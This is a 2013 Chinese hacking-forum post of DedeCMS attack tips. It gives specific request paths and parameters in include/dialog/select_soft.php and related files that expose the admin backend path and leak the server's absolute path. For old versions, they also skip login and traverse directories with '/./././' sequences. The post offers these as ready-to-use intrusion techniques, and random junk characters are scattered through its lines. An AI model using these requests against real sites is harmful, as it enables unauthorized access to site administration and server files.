找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2241|回复: 0
打印 上一主题 下一主题

dedecms爆后台文件技巧

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-16 16:50:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.include/dialog/select_soft.php文件可以爆出DEDECMS的后台,以前的老板本可以跳过登陆验证直接访问,无需管理
6 ]2 x1 m! _$ u- u$ M5 a- P
8 b4 ]5 P- ^7 [, ]* \/ ]  F- d& h员帐号,新版本的就直接转向了后台.
' u$ F& \( `- [
2 z5 _% u4 N+ D" |2 _6 w2.include/dialog/config.php会爆出后台管理路径
9 o5 y# R) q% u
  A8 r2 e* O* B: x1 T! E9 Q3.include/dialog/select_soft.php?activepath=/include/FCKeditor 跳转目录3 d% T6 w( M0 K4 B1 Q- _

1 X- m1 I8 Q. }8 i' _4.include/dialog/select_soft.php?activepath=/st0pst0pst0pst0pst0pst0pst0pst0p 爆出网站绝对路径.! }; ~( a$ S. v" O# f

8 m3 |% E$ |6 E$ I5.另外一些低版本的DEDECMS访问这个页面的时候会直接跳过登陆验证,直接显示,而且还可以用/././././././././掉
; q: u: k6 w2 O
5 L' x: y$ k! p( o% I/ k) ~7 Y1 d到根目录去.不过这些版本的访问地址有些不同.0 |9 s$ C6 A6 }
地址为require/dialog/select_soft.php?activepath=/././././././././% l8 k: d( ]+ E2 a8 ?) Y4 a
4 l0 J$ o  |7 {5 K5 s3 e+ H6 W4 S
include\dialog\目录下的另外几个文件都存在同一个问题,只是默认设的目录不同.有些可以查看HTML这些文件哦..8 B3 X7 q, L6 Q) F, U$ T1 S) B
存在相同问题的文件还有# z% j5 [  s5 C6 x# Z
include\dialog\select_images.php
  n5 v7 x5 S& @' i; O- pinclude\dialog\select_media.php
. a; c: l" K2 q' ?9 L, w6 Cinclude\dialog\select_templets.php​
  ^5 q. o8 u/ u9 f+ C# p8 l4 d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表